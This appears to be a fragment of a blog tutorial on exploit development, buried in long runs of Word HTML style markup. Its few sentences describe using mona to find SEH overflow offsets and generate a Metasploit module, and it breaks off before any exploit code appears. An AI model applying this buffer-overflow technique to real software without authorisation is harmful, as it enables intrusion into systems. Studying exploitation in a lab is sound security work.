UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style> <![endif]--> <br />
<div class="MsoNormal" style="text-align: justify; text-indent: 0in;">This command will analyze the cyclic pattern to calculate offsets to various registers and SEH handlers and gives the payload to include this in metasploit module. This will create a file ‘exploit.rb’ which has all the mentioned details.</div><div class="MsoNormal" style="text-align: justify; text-indent: 0in;"><br />
</div><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: EN-US; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;">Mona has given exploits payload for Direct RET and SEH overflows. Now let’s craft a metasploit module to exploit SEH.</span><br />
<!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves/> <w:TrackFormatting/> <w:PunctuationKerning/> <w:ValidateAgainstSchemas/> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF/> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables/> <w:SnapToGridInCell/> <w:WrapTextWithPunct/> <w:UseAsianBreakRules/> <w:DontGrowAutofit/> <w:SplitPgBreakAndParaMark/> <w:DontVertAlignCellWithSp/> <w:DontBreakConstrainedForcedTables/> <w:DontVertAlignInTxbx/> <w:Word11KerningPairs/> <w:CachedColBalance/> </w:Compatibility> <m:mathPr> <m:mathFont m:val="Cambria Math"/> <m:brkBin m:val="before"/> <m:brkBinSub m:val="--"/> <m:smallFrac m:val="off"/> <m:dispDef/> <m:lMargin m:val="0"/> <m:rMargin m:val="0"/> <m:defJc m:val="centerGroup"/> <m:wrapIndent m:val="1440"/> <m:intLim m:val="subSup"/> <m:naryLim m:val="undOvr"/> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/> <w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/> <w:LsdException Locked="false" Priority="39" Name="toc 1"/> <w:LsdException Locked="false" Priority="39" Name="toc 2"/> <w:LsdException Locked="false" Priority="39" Name="toc 3"/> <w:LsdException Locked="false" Priority="39" Name="toc 4"/> <w:LsdException Locked="false" Priority="39" Name="toc 5"/> <w:LsdException Locked="false" Priority="39" Name="toc 6"/> <w:LsdException Locked="false" Priority="39" Name="toc 7"/> <w:LsdException Locked="false" Priority="39" Name="toc 8"/> <w:LsdException Locked="false" Priority="39" Name="toc 9"/> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/> <w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/> <w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/> <w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/> <w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/> <w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/> <w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/> <w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/> <w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/> <w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style> <![endif]--> <br />
<div class="MsoListParagraph" style="margin-left: .25in; mso-add-space: auto; mso-list: l0 level1 lfo1; text-indent: -.25in;"><b style="mso-bidi-font-weight: normal;"><span style="mso-bidi-font-family: Calibri; mso-fareast-font-family: Calibri;"><span style="mso-list: Ignore;"><span style="font: 7.0pt "Times New Roman";"></span></span></span></b></div><div class="MsoListParagraph" style="margin-left: 0.25in; text-indent: -0.25in;"><b>3. Crafting metasploit module</b></div><div class="MsoNormal"><br />
</div><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: EN-US; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;">Output of </span><span style="background: #BFBFBF; font-family: "Courier New"; font-size: 8.0pt; mso-ansi-language: EN-US; mso-bidi-language: EN-US; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-shading-themecolor: background1; mso-shading-themeshade: 191;">!mona suggest</span><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: EN-US; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;"> has following output for SEH exploit:</span><br />
